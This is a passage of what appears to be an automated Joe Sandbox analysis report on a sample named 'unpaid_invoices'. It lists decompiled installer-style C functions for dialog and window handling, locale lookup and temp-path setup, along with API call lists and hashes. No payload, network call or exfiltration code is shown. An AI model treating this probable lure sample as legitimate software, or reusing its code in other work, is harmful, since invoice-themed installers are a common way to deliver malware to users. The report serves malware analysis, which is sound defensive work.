              0x00000000

              APIs
              • FindFirstFileW.KERNELBASE(76CDFAA0,007A4FD8,007A4790,0040608E,007A4790,007A4790,00000000,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560), ref: 004069AF
              • FindClose.KERNEL32(00000000), ref: 004069BB
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: Find$CloseFileFirst
              • String ID:
              • API String ID: 2295610775-0
              • Opcode ID: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
              • Instruction ID: 60c22f5c8fe31c667ed350a31965a044de81702d272a45ebe5fc25ec47674b4c
              • Opcode Fuzzy Hash: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
              • Instruction Fuzzy Hash: 47D012F15191205FCB4017786E0C84B7A589F573313264B36B0A6F55E0D6748C3787AC
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004040CB Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 141 4040cb-4040dd 142 4040e3-4040e9 141->142 143 404244-404253 141->143 142->143 144 4040ef-4040f8 142->144 145 4042a2-4042b7 143->145 146 404255-404290 GetDlgItem * 2 call 4045ca KiUserCallbackDispatcher call 40140b 143->146 150 4040fa-404107 SetWindowPos 144->150 151 40410d-404114 144->151 148 4042f7-4042fc call 404616 145->148 149 4042b9-4042bc 145->149 167 404295-40429d 146->167 163 404301-40431c 148->163 153 4042be-4042c9 call 401389 149->153 154 4042ef-4042f1 149->154 150->151 156 404116-404130 ShowWindow 151->156 157 404158-40415e 151->157 153->154 180 4042cb-4042ea SendMessageW 153->180 154->148 162 404597 154->162 164 404231-40423f call 404631 156->164 165 404136-404149 GetWindowLongW 156->165 159 404160-404172 DestroyWindow 157->159 160 404177-40417a 157->160 168 404574-40457a 159->168 170 40417c-404188 SetWindowLongW 160->170 171 40418d-404193 160->171 169 404599-4045a0 162->169 174 404325-40432b 163->174 175 40431e-404320 call 40140b 163->175 164->169 165->164 166 40414f-404152 ShowWindow 165->166 166->157 167->145 168->162 176 40457c-404582 168->176 170->169 171->164 179 404199-4041a8 GetDlgItem 171->179 177 404331-40433c 174->177 178 404555-40456e DestroyWindow EndDialog 174->178 175->174 176->162 183 404584-40458d ShowWindow 176->183 177->178 184 404342-40438f call 4066ab call 4045ca * 3 GetDlgItem 177->184 178->168 185 4041c7-4041ca 179->185 186 4041aa-4041c1 SendMessageW IsWindowEnabled 179->186 180->169 183->162 213 404391-404396 184->213 214 404399-4043d5 ShowWindow EnableWindow call 4045ec EnableWindow 184->214 188 4041cc-4041cd 185->188 189 4041cf-4041d2 185->189 186->162 186->185 191 4041fd-404202 call 4045a3 188->191 192 4041e0-4041e5 189->192 193 4041d4-4041da 189->193 191->164 196 40421b-40422b SendMessageW 192->196 198 4041e7-4041ed 192->198 193->196 197 4041dc-4041de 193->197 196->164 197->191 201 404204-40420d call 40140b 198->201 202 4041ef-4041f5 call 40140b 198->202 201->164 211 40420f-404219 201->211 209 4041fb 202->209 209->191 211->209 213->214 217 4043d7-4043d8 214->217 218 4043da 214->218 219 4043dc-40440a GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 40440c-40441d SendMessageW 219->220 221 40441f 219->221 222 404425-404464 call 4045ff call 4040ac call 40666e lstrlenW call 4066ab SetWindowTextW call 401389 220->222 221->222 222->163 233 40446a-40446c 222->233 233->163 234 404472-404476 233->234 235 404495-4044a9 DestroyWindow 234->235 236 404478-40447e 234->236 235->168 238 4044af-4044dc CreateDialogParamW 235->238 236->162 237 404484-40448a 236->237 237->163 239 404490 237->239 238->168 240 4044e2-404539 call 4045ca GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->162 240->162 245 40453b-404553 ShowWindow call 404616 240->245 245->168
              C-Code - Quality: 84%
              			E004040CB(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x7a1f70 = _t34;
					if(_t130 == 0x110) {
						 *0x7a8aa8 = _t127;
						 *0x7a1f84 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x79ff50 = _t91;
						E004045CA(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x7a7a88); // executed
						 *0x7a7a6c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x7a1f70 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x7a8ac0;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404616(0x40b);
						while(1) {
							_t36 =  *0x7a1f70;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x7a8ac4;
							if(_t38 ==  *0x7a8ac4) {
								E0040140B(1);
							}
							__eflags =  *0x7a7a6c - _t136;
							if( *0x7a7a6c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x7a8ac4; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066AB(_t117, _t127, _t133, 0x7b8000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045CA(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045CA(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045CA(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x7a8b2c - _t136;
							_v28 = _t48;
							if( *0x7a8b2c != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004045EC(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x79ff50, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x7a8b2c - _t136;
							if( *0x7a8b2c == _t136) {
								_push( *0x7a1f84);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x79ff50);
							}
							E004045FF();
							E0040666E(0x7a1f88, E004040AC());
							E004066AB(0x7a1f88, _t127, _t133,  &(0x7a1f88[lstrlenW(0x7a1f88)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x7a1f88);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x7a7a78);
									 *0x7a0f60 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x7a8aa0,  *_t133 +  *0x7a7a80 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x7a7a78 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045CA(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x7a7a78, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x7a7a6c - _t136;
									if( *0x7a7a6c != _t136) {
										goto L63;
									}
									ShowWindow( *0x7a7a78, 8);
									E00404616(0x405);
									goto L60;
								}
								__eflags =  *0x7a8b2c - _t136;
								if( *0x7a8b2c != _t136) {
									goto L63;
								}
								__eflags =  *0x7a8b20 - _t136;
								if( *0x7a8b20 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x7a7a78); // executed
						 *0x7a8aa8 = _t136;
						EndDialog(_t127,  *0x7a0758); // executed
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x7a7a78, 0x40f, 0, 1);
						__eflags =  *0x7a7a6c;
						return 0 |  *0x7a7a6c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x7a1f68, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x7a7a78, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x7a8b2c - _t136;
											if( *0x7a8b2c == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x7a0758 = 1;
												L23:
												_push(0x78);
												L24:
												E004045A3();
												goto L28;
											}
											E0040140B(_t129);
											 *0x7a0758 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x7a7a78);
						 *0x7a7a78 = _t122;
						L60:
						if( *0x7a3f88 == _t136 &&  *0x7a7a78 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x7a3f88 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x7a1f68,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E00404631(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}































              0x004040d6
              0x004040dd
              0x00404244
              0x00404248
              0x0040424c
              0x0040424e
              0x00404253
              0x0040425e
              0x00404269
              0x0040426e
              0x00404270
              0x00404272
              0x00404275
              0x0040427a
              0x00404288
              0x00404295
              0x0040429c
              0x0040429c
              0x0040429d
              0x0040429d
              0x004042a2
              0x004042a8
              0x004042af
              0x004042b5
              0x004042b7
              0x004042f7
              0x004042fc
              0x00404301
              0x00404301
              0x00404306
              0x0040430f
              0x00404311
              0x00404316
              0x0040431c
              0x00404320
              0x00404320
              0x00404325
              0x0040432b
              0x00000000
              0x00000000
              0x00404336
              0x0040433c
              0x00000000
              0x00000000
              0x00404345
              0x0040434d
              0x00404352
              0x00404355
              0x0040435b
              0x00404360
              0x00404363
              0x00404369
              0x0040436e
              0x00404371
              0x00404377
              0x0040437f
              0x00404385
              0x0040438b
              0x0040438f
              0x00404396
              0x00404396
              0x00404396
              0x004043a0
              0x004043b2
              0x004043be
              0x004043c3
              0x004043cd
              0x004043d3
              0x004043d5
              0x004043da
              0x004043d7
              0x004043d7
              0x004043d7
              0x004043ea
              0x00404402
              0x00404404
              0x0040440a
              0x0040441f
              0x0040440c
              0x00404415
              0x00404417
              0x00404417
              0x00404425
              0x00404436
              0x0040444c
              0x00404453
              0x00404459
              0x0040445d
              0x00404462
              0x00404464
              0x00000000
              0x0040446a
              0x0040446a
              0x0040446c
              0x00000000
              0x00000000
              0x00404472
              0x00404476
              0x0040449b
              0x004044a1
              0x004044a7
              0x004044a9
              0x00000000
              0x00000000
              0x004044cf
              0x004044d5
              0x004044d7
              0x004044dc
              0x00000000
              0x00000000
              0x004044e2
              0x004044e5
              0x004044e8
              0x004044ff
              0x0040450b
              0x00404524
              0x0040452a
              0x0040452e
              0x00404533
              0x00404539
              0x00000000
              0x00000000
              0x00404543
              0x0040454e
              0x00000000
              0x0040454e
              0x00404478
              0x0040447e
              0x00000000
              0x00000000
              0x00404484
              0x0040448a
              0x00000000
              0x00000000
              0x00000000
              0x00404490
              0x00404464
              0x0040455b
              0x00404567
              0x0040456e
              0x00000000
              0x004042b9
              0x004042b9
              0x004042bc
              0x004042ef
              0x004042ef
              0x004042f1
              0x00000000
              0x00000000
              0x00000000
              0x004042f1
              0x004042be
              0x004042c2
              0x004042c7
              0x004042c9
              0x00000000
              0x00000000
              0x004042d9
              0x004042e1
              0x00000000
              0x004042e7
              0x004040ef
              0x004040ef
              0x004040f3
              0x004040f8
              0x00404107
              0x00404107
              0x0040410d
              0x00404114
              0x00404158
              0x0040415e
              0x00404177
              0x0040417a
              0x0040418d
              0x00404193
              0x00000000
              0x00000000
              0x00404199
              0x004041a4
              0x004041a6
              0x004041a8
              0x004041c7
              0x004041c7
              0x004041ca
              0x004041cf
              0x004041d2
              0x004041e2
              0x004041e3
              0x004041e5
              0x0040421b
              0x0040422b
              0x00000000
              0x0040422b
              0x004041e7
              0x004041ed
              0x00404206
              0x0040420b
              0x0040420d
              0x00000000
              0x00000000
              0x0040420f
              0x004041fb
              0x004041fb
              0x004041fd
              0x004041fd
              0x00000000
              0x004041fd
              0x004041f0
              0x004041f5
              0x00000000
              0x004041f5
              0x004041d4
              0x004041da
              0x00000000
              0x00000000
              0x004041dc
              0x00000000
              0x004041dc
              0x004041cc
              0x00000000
              0x004041cc
              0x004041b2
              0x004041b9
              0x004041bf
              0x004041c1
              0x00404597
              0x00000000
              0x00404597
              0x00000000
              0x004041c1
              0x0040417f
              0x00000000
              0x00404187
              0x00404166
              0x0040416c
              0x00404574
              0x0040457a
              0x00404587
              0x0040458d
              0x0040458d
              0x00000000
              0x00404116
              0x0040411b
              0x00404127
              0x00404130
              0x00404231
              0x00000000
              0x0040414f
              0x00404152
              0x00000000
              0x00404152
              0x00404130
              0x00404114

              APIs
              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404107
              • ShowWindow.USER32(?), ref: 00404127
              • GetWindowLongW.USER32(?,000000F0), ref: 00404139
              • ShowWindow.USER32(?,00000004), ref: 00404152
              • DestroyWindow.USER32 ref: 00404166
              • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040417F
              • GetDlgItem.USER32 ref: 0040419E
              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041B2
              • IsWindowEnabled.USER32(00000000), ref: 004041B9
              • GetDlgItem.USER32 ref: 00404264
              • GetDlgItem.USER32 ref: 0040426E
              • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404288
              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D9
              • GetDlgItem.USER32 ref: 0040437F
              • ShowWindow.USER32(00000000,?), ref: 004043A0
              • EnableWindow.USER32(?,?), ref: 004043B2
              • EnableWindow.USER32(?,?), ref: 004043CD
              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043E3
              • EnableMenuItem.USER32 ref: 004043EA
              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404402
              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404415
              • lstrlenW.KERNEL32(007A1F88,?,007A1F88,00000000), ref: 0040443F
              • SetWindowTextW.USER32(?,007A1F88), ref: 00404453
              • ShowWindow.USER32(?,0000000A), ref: 00404587
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
              • String ID:
              • API String ID: 2475350683-0
              • Opcode ID: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
              • Instruction ID: f65a6081c11fa3fb00f54a078e57315272211b1d7c342d1bec1514082707246b
              • Opcode Fuzzy Hash: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
              • Instruction Fuzzy Hash: 63C1ADB1500204BFDB216F65EE49E2A3AA8EBC6745F00853EF741B55E0CB3D5851DB2E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00403D1D Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215stringregistryCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 248 403d1d-403d35 call 406a3b 251 403d37-403d42 GetUserDefaultUILanguage call 4065b5 248->251 252 403d49-403d80 call 40653c 248->252 255 403d47 251->255 258 403d82-403d93 call 40653c 252->258 259 403d98-403d9e lstrcatW 252->259 257 403da3-403dcc call 403ff3 call 406045 255->257 265 403dd2-403dd7 257->265 266 403e5e-403e66 call 406045 257->266 258->259 259->257 265->266 267 403ddd-403e05 call 40653c 265->267 272 403e74-403e99 LoadImageW 266->272 273 403e68-403e6f call 4066ab 266->273 267->266 274 403e07-403e0b 267->274 276 403f1a-403f22 call 40140b 272->276 277 403e9b-403ecb RegisterClassW 272->277 273->272 278 403e1d-403e29 lstrlenW 274->278 279 403e0d-403e1a call 405f6a 274->279 290 403f24-403f27 276->290 291 403f2c-403f37 call 403ff3 276->291 280 403ed1-403f15 SystemParametersInfoW CreateWindowExW 277->280 281 403fe9 277->281 285 403e51-403e59 call 405f3d call 40666e 278->285 286 403e2b-403e39 lstrcmpiW 278->286 279->278 280->276 284 403feb-403ff2 281->284 285->266 286->285 289 403e3b-403e45 GetFileAttributesW 286->289 294 403e47-403e49 289->294 295 403e4b-403e4c call 405f89 289->295 290->284 300 403fc0-403fc8 call 4057a3 291->300 301 403f3d-403f57 ShowWindow call 4069cb 291->301 294->285 294->295 295->285 306 403fe2-403fe4 call 40140b 300->306 307 403fca-403fd0 300->307 308 403f63-403f75 GetClassInfoW 301->308 309 403f59-403f5e call 4069cb 301->309 306->281 307->290 310 403fd6-403fdd call 40140b 307->310 313 403f77-403f87 GetClassInfoW RegisterClassW 308->313 314 403f8d-403fb0 DialogBoxParamW call 40140b 308->314 309->308 310->290 313->314 318 403fb5-403fbe call 403c6d 314->318 318->284
              C-Code - Quality: 96%
              			E00403D1D(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				signed short _t73;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x7a8ab0;
				_t22 = E00406A3B(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x7a1f88;
					L"1033" = 0x30;
					 *0x7b5002 = 0x78;
					 *0x7b5004 = 0;
					E0040653C(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f88, 0);
					__eflags =  *0x7a1f88;
					if(__eflags == 0) {
						E0040653C(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x7a1f88, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					_t73 =  *_t22(); // executed
					E004065B5(L"1033", _t73 & 0x0000ffff);
				}
				E00403FF3(_t78, _t90);
				_t86 = L"C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x7a8b20 =  *0x7a8ab8 & 0x00000020;
				 *0x7a8b3c = 0x10000;
				if(E00406045(_t90, L"C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00406045(_t98, _t86) == 0) {
						E004066AB(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x7a8aa0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x7a7a88 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FF3(_t78, __eflags);
							__eflags =  *0x7a8b40;
							if( *0x7a8b40 != 0) {
								_t33 = E004057A3(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x7a7a6c;
								if( *0x7a7a6c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x7a1f68, 5); // executed
							_t39 = E004069CB("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069CB("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x7a7a40);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x7a7a40);
								 *0x7a7a64 = _t87;
								RegisterClassW(0x7a7a40);
							}
							_t44 = DialogBoxParamW( *0x7a8aa0,  *0x7a7a80 + 0x00000069 & 0x0000ffff, 0, E004040CB, 0); // executed
							E00403C6D(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x7a8aa0;
						 *0x7a7a44 = E00401000;
						 *0x7a7a50 =  *0x7a8aa0;
						 *0x7a7a54 = _t30;
						 *0x7a7a64 = 0x40a3b4;
						if(RegisterClassW(0x7a7a40) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x7a1f68 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8aa0, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x7a6a40;
					E0040653C(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x7a8ad8 + _t78 * 2,  *0x7a8ad8 +  *(_t82 + 0x4c) * 2, 0x7a6a40, 0);
					_t63 =  *0x7a6a40; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x7a6a42;
						 *((short*)(E00405F6A(0x7a6a42, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040666E(_t86, E00405F3D(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F89(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























              0x00403d23
              0x00403d2c
              0x00403d33
              0x00403d35
              0x00403d49
              0x00403d5b
              0x00403d64
              0x00403d6d
              0x00403d74
              0x00403d79
              0x00403d80
              0x00403d93
              0x00403d93
              0x00403d9e
              0x00403d37
              0x00403d37
              0x00403d42
              0x00403d42
              0x00403da3
              0x00403dad
              0x00403db6
              0x00403dbb
              0x00403dcc
              0x00403e5e
              0x00403e66
              0x00403e6f
              0x00403e6f
              0x00403e85
              0x00403e8b
              0x00403e99
              0x00403f1a
              0x00403f22
              0x00403f2c
              0x00403f31
              0x00403f37
              0x00403fc1
              0x00403fc6
              0x00403fc8
              0x00403fe4
              0x00000000
              0x00403fe4
              0x00403fca
              0x00403fd0
              0x00403fd8
              0x00403fd8
              0x00000000
              0x00403fd0
              0x00403f45
              0x00403f50
              0x00403f55
              0x00403f57
              0x00403f5e
              0x00403f5e
              0x00403f69
              0x00403f71
              0x00403f73
              0x00403f75
              0x00403f7e
              0x00403f81
              0x00403f87
              0x00403f87
              0x00403fa6
              0x00403fb7
              0x00000000
              0x00403fbc
              0x00403f24
              0x00403f26
              0x00000000
              0x00403e9b
              0x00403e9b
              0x00403ea7
              0x00403eb1
              0x00403eb7
              0x00403ebc
              0x00403ecb
              0x00403fe9
              0x00403fe9
              0x00000000
              0x00403fe9
              0x00403eda
              0x00403f15
              0x00000000
              0x00403f15
              0x00403dd2
              0x00403dd2
              0x00403dd5
              0x00403dd7
              0x00000000
              0x00000000
              0x00403de5
              0x00403df7
              0x00403dfc
              0x00403e05
              0x00000000
              0x00000000
              0x00403e0b
              0x00403e0d
              0x00403e1a
              0x00403e1a
              0x00403e23
              0x00403e29
              0x00403e51
              0x00403e59
              0x00000000
              0x00403e3b
              0x00403e3c
              0x00403e45
              0x00403e4b
              0x00403e4c
              0x00000000
              0x00403e4c
              0x00403e47
              0x00403e49
              0x00000000
              0x00000000
              0x00000000
              0x00403e49
              0x00403e29

              APIs
                • Part of subcall function 00406A3B: GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
                • Part of subcall function 00406A3B: GetProcAddress.KERNEL32(00000000,?), ref: 00406A68
